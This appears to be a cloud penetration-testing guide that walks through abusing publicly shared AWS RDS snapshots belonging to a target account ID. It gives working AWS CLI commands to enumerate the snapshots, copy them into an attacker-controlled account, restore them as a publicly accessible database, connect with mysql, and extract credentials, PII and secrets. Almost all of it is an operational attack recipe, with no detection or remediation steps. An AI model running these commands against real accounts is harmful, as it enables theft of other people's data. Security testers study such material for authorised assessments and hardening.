Cloud Pentesting: 03_AWS [ Publically available RDS snapshot ]

 Identify publicly shared RDS database snapshots belonging to a known AWS account, restore them into an attacker-controlled account, and extract sensitive data.

---

🧭 Attack Flow (Generic Steps)

1. Start with Target AWS Account ID

   • Obtain through passive recon, cloud asset leaks, public repos, etc.

2. Search for Public RDS Snapshots

   • Use AWS CLI to enumerate RDS snapshots with --snapshot-type public

   • Filter results by snapshot owner (Account ID)

   aws rds describe-db-snapshots \
     --snapshot-type public \
     --region <region> \
     --query "DBSnapshots[?SnapshotOwnerId=='<target_account_id>']"
   

3. Check if Snapshot is Unencrypted

   • If "Encrypted": false, snapshot can be restored by anyone

   • If "Encrypted": true, restoration is only possible with access to the related KMS key (rare)

4. Copy the Snapshot to Attacker's Account

   • Snapshot must be copied before it can be restored

   aws rds copy-db-snapshot \
     --source-db-snapshot-identifier arn:aws:rds:<region>:<target_account_id>:snapshot:<snapshot_name> \
     --target-db-snapshot-identifier <new_snapshot_name>
   

5. Restore Snapshot into New RDS Instance

   • Choose correct DB engine (mysql, postgres, etc.)

   • Optionally make it publicly accessible

   aws rds restore-db-instance-from-db-snapshot \
     --db-instance-identifier <instance_name> \
     --db-snapshot-identifier <new_snapshot_name> \
     --db-instance-class db.t3.micro \
     --engine <db_engine> \
     --publicly-accessible
   

6. Connect to Restored DB Instance

   • Use endpoint obtained via:

     aws rds describe-db-instances --db-instance-identifier <instance_name>
     

   • Connect using standard tools like:

     mysql -h <endpoint> -u <user> -p
     

7. Explore and Exfiltrate Data

   • Query internal tables

   • Look for credentials, PII, secrets, logs, etc.